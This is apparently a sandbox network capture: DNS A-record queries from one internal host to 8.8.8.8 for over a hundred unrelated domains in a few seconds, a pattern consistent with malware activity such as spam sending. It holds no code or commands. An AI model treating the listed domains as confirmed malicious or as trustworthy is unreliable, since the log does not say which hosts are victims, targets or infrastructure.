Mar 22, 2023 05:44:40.436098099 CET	192.168.2.5	8.8.8.8	0xe385	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.523978949 CET	192.168.2.5	8.8.8.8	0x3f5	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.526736021 CET	192.168.2.5	8.8.8.8	0x1627	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.589410067 CET	192.168.2.5	8.8.8.8	0xd4f9	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.596241951 CET	192.168.2.5	8.8.8.8	0x66bc	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.617727041 CET	192.168.2.5	8.8.8.8	0x6717	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.620171070 CET	192.168.2.5	8.8.8.8	0xfb91	Standard query (0)	wahw.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.620326042 CET	192.168.2.5	8.8.8.8	0x2966	Standard query (0)	mackusick.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.649310112 CET	192.168.2.5	8.8.8.8	0x5863	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.729455948 CET	192.168.2.5	128.8.10.90	0xfc	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:40.739476919 CET	192.168.2.5	8.8.8.8	0x4e25	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.743586063 CET	192.168.2.5	8.8.8.8	0x95f7	Standard query (0)	canasil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.759690046 CET	192.168.2.5	8.8.8.8	0xb606	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.782075882 CET	192.168.2.5	8.8.8.8	0x6f50	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.844425917 CET	192.168.2.5	8.8.8.8	0xe95f	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.859383106 CET	192.168.2.5	8.8.8.8	0xcb10	Standard query (0)	unicus.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.868125916 CET	192.168.2.5	8.8.8.8	0x77ff	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.870446920 CET	192.168.2.5	8.8.8.8	0x9d59	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.905673981 CET	192.168.2.5	8.8.8.8	0xf730	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.034564018 CET	192.168.2.5	8.8.8.8	0x7fe2	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.049592972 CET	192.168.2.5	8.8.8.8	0xd913	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.053358078 CET	192.168.2.5	8.8.8.8	0xdb16	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.053358078 CET	192.168.2.5	8.8.8.8	0xee90	Standard query (0)	mackusick.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.070338964 CET	192.168.2.5	8.8.8.8	0x6c94	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.079880953 CET	192.168.2.5	8.8.8.8	0x82ea	Standard query (0)	magicomm.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.080626011 CET	192.168.2.5	8.8.8.8	0x3700	Standard query (0)	techtrans.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.114136934 CET	192.168.2.5	8.8.8.8	0xefc7	Standard query (0)	vonparis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.128432035 CET	192.168.2.5	8.8.8.8	0xb2b	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.129196882 CET	192.168.2.5	8.8.8.8	0xcd9	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.130244017 CET	192.168.2.5	8.8.8.8	0xfa8a	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.131810904 CET	192.168.2.5	8.8.8.8	0xb65e	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.138983011 CET	192.168.2.5	8.8.8.8	0x3d44	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.140747070 CET	192.168.2.5	8.8.8.8	0x10c6	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.142282963 CET	192.168.2.5	8.8.8.8	0xe9c0	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.144243002 CET	192.168.2.5	8.8.8.8	0xc685	Standard query (0)	amerifor.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.147802114 CET	192.168.2.5	8.8.8.8	0xfa73	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.276773930 CET	192.168.2.5	8.8.8.8	0xc127	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.277544975 CET	192.168.2.5	8.8.8.8	0x6f6a	Standard query (0)	sidepath.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.291779041 CET	192.168.2.5	8.8.8.8	0xd341	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.295186996 CET	192.168.2.5	8.8.8.8	0x57e6	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.343600035 CET	192.168.2.5	8.8.8.8	0xd2db	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.365504980 CET	192.168.2.5	8.8.8.8	0xf9d4	Standard query (0)	indonesiamedia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.367958069 CET	192.168.2.5	8.8.8.8	0xa31c	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.395253897 CET	192.168.2.5	8.8.8.8	0xcdb7	Standard query (0)	shiner.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.400619030 CET	192.168.2.5	8.8.8.8	0xc3a7	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.481564999 CET	192.168.2.5	8.8.8.8	0xb4fb	Standard query (0)	gphpedit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.486432076 CET	192.168.2.5	8.8.8.8	0xf93b	Standard query (0)	gphpedit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.506963015 CET	192.168.2.5	8.8.8.8	0x2823	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.510202885 CET	192.168.2.5	8.8.8.8	0xd0f4	Standard query (0)	holp-ai.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.697609901 CET	192.168.2.5	8.8.8.8	0x418e	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.766058922 CET	192.168.2.5	8.8.8.8	0xe6a7	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.819308996 CET	192.168.2.5	8.8.8.8	0x9dc8	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.860614061 CET	192.168.2.5	8.8.8.8	0x1507	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.929600954 CET	192.168.2.5	8.8.8.8	0x7aee	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.954227924 CET	192.168.2.5	8.8.8.8	0xf730	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.016335964 CET	192.168.2.5	8.8.8.8	0x213b	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.022526979 CET	192.168.2.5	8.8.8.8	0x92ba	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.111629009 CET	192.168.2.5	8.8.8.8	0x4376	Standard query (0)	kumaden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.134892941 CET	192.168.2.5	8.8.8.8	0xe7a2	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.138592005 CET	192.168.2.5	8.8.8.8	0xb5ba	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.145060062 CET	192.168.2.5	8.8.8.8	0x1d55	Standard query (0)	clinicasanluis.com.co	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.145255089 CET	192.168.2.5	8.8.8.8	0x6970	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.145255089 CET	192.168.2.5	8.8.8.8	0xf90	Standard query (0)	dataform.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.145409107 CET	192.168.2.5	8.8.8.8	0xd792	Standard query (0)	muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.149245024 CET	192.168.2.5	8.8.8.8	0x5d9c	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.149245024 CET	192.168.2.5	8.8.8.8	0x6d87	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.151217937 CET	192.168.2.5	8.8.8.8	0x9ecf	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.151217937 CET	192.168.2.5	8.8.8.8	0x4e28	Standard query (0)	cbaben.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.154345989 CET	192.168.2.5	8.8.8.8	0x864a	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.163398981 CET	192.168.2.5	8.8.8.8	0x6141	Standard query (0)	hyab.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.171418905 CET	192.168.2.5	8.8.8.8	0x4ee4	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.183257103 CET	192.168.2.5	8.8.8.8	0x34f8	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.198163986 CET	192.168.2.5	8.8.8.8	0x81fa	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.200809956 CET	192.168.2.5	8.8.8.8	0x6c9	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.228235006 CET	192.168.2.5	8.8.8.8	0x5207	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.230495930 CET	192.168.2.5	8.8.8.8	0xa9e3	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.278480053 CET	192.168.2.5	8.8.8.8	0xc3e3	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.438230991 CET	192.168.2.5	8.8.8.8	0x7513	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.441318989 CET	192.168.2.5	8.8.8.8	0x71a	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.461352110 CET	192.168.2.5	8.8.8.8	0x5622	Standard query (0)	orlyhotel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.463238955 CET	192.168.2.5	8.8.8.8	0xa3cd	Standard query (0)	kavram.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.490441084 CET	192.168.2.5	8.8.8.8	0x8562	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.492810965 CET	192.168.2.5	8.8.8.8	0x163b	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.559761047 CET	192.168.2.5	8.8.8.8	0xfd9c	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.574775934 CET	192.168.2.5	8.8.8.8	0xf617	Standard query (0)	www.muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.575303078 CET	192.168.2.5	8.8.8.8	0x48d	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.622454882 CET	192.168.2.5	8.8.8.8	0xdd93	Standard query (0)	diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.701353073 CET	192.168.2.5	8.8.8.8	0xe848	Standard query (0)	jnf.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.748189926 CET	192.168.2.5	8.8.8.8	0x60ac	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.766670942 CET	192.168.2.5	8.8.8.8	0xa650	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.792752028 CET	192.168.2.5	8.8.8.8	0xbbeb	Standard query (0)	sgk.home.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.793570995 CET	192.168.2.5	8.8.8.8	0x3b59	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.796705961 CET	192.168.2.5	8.8.8.8	0xcc06	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.903043032 CET	192.168.2.5	8.8.8.8	0x39a8	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.904150963 CET	192.168.2.5	8.8.8.8	0x9ec1	Standard query (0)	aoinko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.930299044 CET	192.168.2.5	8.8.8.8	0xc68a	Standard query (0)	tcpoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.995834112 CET	192.168.2.5	8.8.8.8	0xe43d	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.013221979 CET	192.168.2.5	8.8.8.8	0x18d0	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.013895988 CET	192.168.2.5	8.8.8.8	0xab38	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.082050085 CET	192.168.2.5	8.8.8.8	0x3692	Standard query (0)	kayoaiba.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.116488934 CET	192.168.2.5	8.8.8.8	0x959e	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.133467913 CET	192.168.2.5	8.8.8.8	0xab25	Standard query (0)	epc.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.133467913 CET	192.168.2.5	8.8.8.8	0x27b1	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.134773016 CET	192.168.2.5	8.8.8.8	0x5c9c	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.223928928 CET	192.168.2.5	8.8.8.8	0xfc69	Standard query (0)	angework.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.229600906 CET	192.168.2.5	8.8.8.8	0x3448	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.239458084 CET	192.168.2.5	8.8.8.8	0xc980	Standard query (0)	atb-lit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.239458084 CET	192.168.2.5	8.8.8.8	0x3ade	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.245505095 CET	192.168.2.5	8.8.8.8	0x229b	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.245537996 CET	192.168.2.5	8.8.8.8	0x4db6	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.247365952 CET	192.168.2.5	8.8.8.8	0x6bee	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.249779940 CET	192.168.2.5	8.8.8.8	0x5575	Standard query (0)	juso-gr.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.296175957 CET	192.168.2.5	8.8.8.8	0x2aee	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.342582941 CET	192.168.2.5	8.8.8.8	0xe204	Standard query (0)	redgiga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.373254061 CET	192.168.2.5	8.8.8.8	0x189d	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.404489040 CET	192.168.2.5	8.8.8.8	0x387a	Standard query (0)	jsaps.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.420027018 CET	192.168.2.5	8.8.8.8	0x9527	Standard query (0)	kewlmail.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.447882891 CET	192.168.2.5	8.8.8.8	0x390	Standard query (0)	willsub.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.460311890 CET	192.168.2.5	8.8.8.8	0xc36e	Standard query (0)	impexnc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.461865902 CET	192.168.2.5	8.8.8.8	0xeb2d	Standard query (0)	sinwal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.569396019 CET	192.168.2.5	8.8.8.8	0x7871	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.569396973 CET	192.168.2.5	8.8.8.8	0x75c4	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.570849895 CET	192.168.2.5	8.8.8.8	0x137d	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.604171991 CET	192.168.2.5	8.8.8.8	0xf37b	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.610944033 CET	192.168.2.5	8.8.8.8	0xd997	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.671596050 CET	192.168.2.5	8.8.8.8	0xdf47	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.870321989 CET	192.168.2.5	8.8.8.8	0x43e5	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.888408899 CET	192.168.2.5	8.8.8.8	0x114b	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.972511053 CET	192.168.2.5	8.8.8.8	0x4de5	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.980097055 CET	192.168.2.5	8.8.8.8	0x55af	Standard query (0)	snf.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.980398893 CET	192.168.2.5	8.8.8.8	0x891c	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.983916044 CET	192.168.2.5	8.8.8.8	0xdd8f	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.983916998 CET	192.168.2.5	8.8.8.8	0x3acc	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.985799074 CET	192.168.2.5	8.8.8.8	0x62c2	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.985799074 CET	192.168.2.5	8.8.8.8	0x9d95	Standard query (0)	leapc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.006720066 CET	192.168.2.5	8.8.8.8	0xb22b	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.042718887 CET	192.168.2.5	8.8.8.8	0xb499	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.080468893 CET	192.168.2.5	8.8.8.8	0x39a8	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.088689089 CET	192.168.2.5	8.8.8.8	0x5c03	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.109563112 CET	192.168.2.5	8.8.8.8	0xd842	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.151329994 CET	192.168.2.5	8.8.8.8	0xd9c4	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.151832104 CET	192.168.2.5	8.8.8.8	0xca9a	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.151832104 CET	192.168.2.5	8.8.8.8	0xeb18	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.152014971 CET	192.168.2.5	8.8.8.8	0x5c7e	Standard query (0)	s5w.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.165709972 CET	192.168.2.5	8.8.8.8	0xffa6	Standard query (0)	nts-web.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.296786070 CET	192.168.2.5	8.8.8.8	0xbaf2	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.298566103 CET	192.168.2.5	8.8.8.8	0x6ca3	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.317656040 CET	192.168.2.5	8.8.8.8	0xf3a9	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.359287024 CET	192.168.2.5	8.8.8.8	0x70e9	Standard query (0)	insia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.359819889 CET	192.168.2.5	8.8.8.8	0x38ed	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.410088062 CET	192.168.2.5	8.8.8.8	0x982f	Standard query (0)	pcoyuncu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.410088062 CET	192.168.2.5	8.8.8.8	0x6a28	Standard query (0)	dhh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.410870075 CET	192.168.2.5	8.8.8.8	0x1983	Standard query (0)	strazynski.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.418982983 CET	192.168.2.5	8.8.8.8	0xc6f3	Standard query (0)	sigtoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.419754982 CET	192.168.2.5	8.8.8.8	0xb083	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.424345970 CET	192.168.2.5	8.8.8.8	0x619f	Standard query (0)	metaforacom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.428678989 CET	192.168.2.5	8.8.8.8	0x72f3	Standard query (0)	ramkome.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.489815950 CET	192.168.2.5	8.8.8.8	0x4ece	Standard query (0)	ncn.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.497981071 CET	192.168.2.5	8.8.8.8	0x4bfb	Standard query (0)	alexpope.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.521282911 CET	192.168.2.5	8.8.8.8	0xa5c0	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.527718067 CET	192.168.2.5	8.8.8.8	0x4498	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.529679060 CET	192.168.2.5	8.8.8.8	0xf655	Standard query (0)	fortknox.bm	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.530371904 CET	192.168.2.5	8.8.8.8	0x25d4	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.530644894 CET	192.168.2.5	8.8.8.8	0x5ec1	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.575623989 CET	192.168.2.5	8.8.8.8	0xb4de	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.659079075 CET	192.168.2.5	8.8.8.8	0x64b3	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.685817957 CET	192.168.2.5	8.8.8.8	0xe98b	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.689596891 CET	192.168.2.5	8.8.8.8	0x884c	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.763107061 CET	192.168.2.5	8.8.8.8	0x11fd	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.773822069 CET	192.168.2.5	8.8.8.8	0xe00a	Standard query (0)	stopllc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.773822069 CET	192.168.2.5	8.8.8.8	0x66fa	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.776103020 CET	192.168.2.5	8.8.8.8	0x712d	Standard query (0)	xult.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.861315012 CET	192.168.2.5	8.8.8.8	0xac21	Standard query (0)	smitko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.864876032 CET	192.168.2.5	8.8.8.8	0x71a6	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.871567965 CET	192.168.2.5	8.8.8.8	0x7c8e	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.872513056 CET	192.168.2.5	8.8.8.8	0xba9	Standard query (0)	e-kami.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.872720003 CET	192.168.2.5	8.8.8.8	0xf866	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.932503939 CET	192.168.2.5	8.8.8.8	0xa237	Standard query (0)	ccssinc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.943264008 CET	192.168.2.5	8.8.8.8	0xaae2	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.946317911 CET	192.168.2.5	8.8.8.8	0x5bb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.946923971 CET	192.168.2.5	8.8.8.8	0x6cae	Standard query (0)	bidroll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.001292944 CET	192.168.2.5	8.8.8.8	0x30f5	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.066708088 CET	192.168.2.5	8.8.8.8	0xf5a9	Standard query (0)	oozkranj.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.069570065 CET	192.168.2.5	8.8.8.8	0xed3e	Standard query (0)	roewer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.075886011 CET	192.168.2.5	8.8.8.8	0xdd5f	Standard query (0)	webavant.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.089041948 CET	192.168.2.5	8.8.8.8	0x2394	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.131958008 CET	192.168.2.5	8.8.8.8	0xd27e	Standard query (0)	smitko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.134445906 CET	192.168.2.5	8.8.8.8	0xad9c	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.174161911 CET	192.168.2.5	8.8.8.8	0xca9a	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.197602034 CET	192.168.2.5	8.8.8.8	0x9e72	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.235996962 CET	192.168.2.5	8.8.8.8	0x2829	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.244096994 CET	192.168.2.5	8.8.8.8	0xc118	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
